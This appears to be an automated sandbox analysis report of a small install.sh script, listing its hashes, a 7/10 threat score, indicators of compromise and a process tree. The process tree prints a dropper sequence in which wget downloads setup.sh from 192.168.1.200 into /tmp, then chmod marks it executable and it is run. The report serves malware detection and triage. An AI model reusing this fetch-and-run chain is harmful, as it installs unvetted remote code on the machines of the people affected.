8b658a94a41bf23d91c1b484bc27550afead731b9b031d8f79fdf934709a48a8

Analysis

max time kernel
147s
max time network
151s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
23/05/2024, 12:22

Target

install.sh
Size

171B
MD5

57cbca0ef9e1112a7f165667b4691e4e
SHA1

20d973ae2aedc1404c37119bf11899be88dea781
SHA256

8b658a94a41bf23d91c1b484bc27550afead731b9b031d8f79fdf934709a48a8
SHA512

17ebcbcd8c85fc576986cd74d2d399d3272e6da5b761dbd335ea587105bc3365de43e383e8b9ed6d1e8eabb9400177395c0a65403fe9c53aa479fa6f5cd164af

Score

7^/10

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/adk_desktop_client.sh	1502	adk_desktop_client.sh

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/adk_desktop_client.sh	wget

/tmp/install.sh
/tmp/install.sh
1⤵
PID:1493
- /bin/rm
  rm -f /tmp/adk_desktop_client.sh
  2⤵
  PID:1494
- /usr/bin/wget
  wget -O /tmp/adk_desktop_client.sh http://192.168.1.200/setup.sh
  2⤵
  - Writes file to tmp directory
  PID:1495
- /bin/chmod
  chmod +x /tmp/adk_desktop_client.sh
  2⤵
  PID:1501
- /tmp/adk_desktop_client.sh
  /tmp/adk_desktop_client.sh
  2⤵
  - Executes dropped EXE
  PID:1502
- /bin/sh
  /bin/sh /tmp/adk_desktop_client.sh
  2⤵
  PID:1502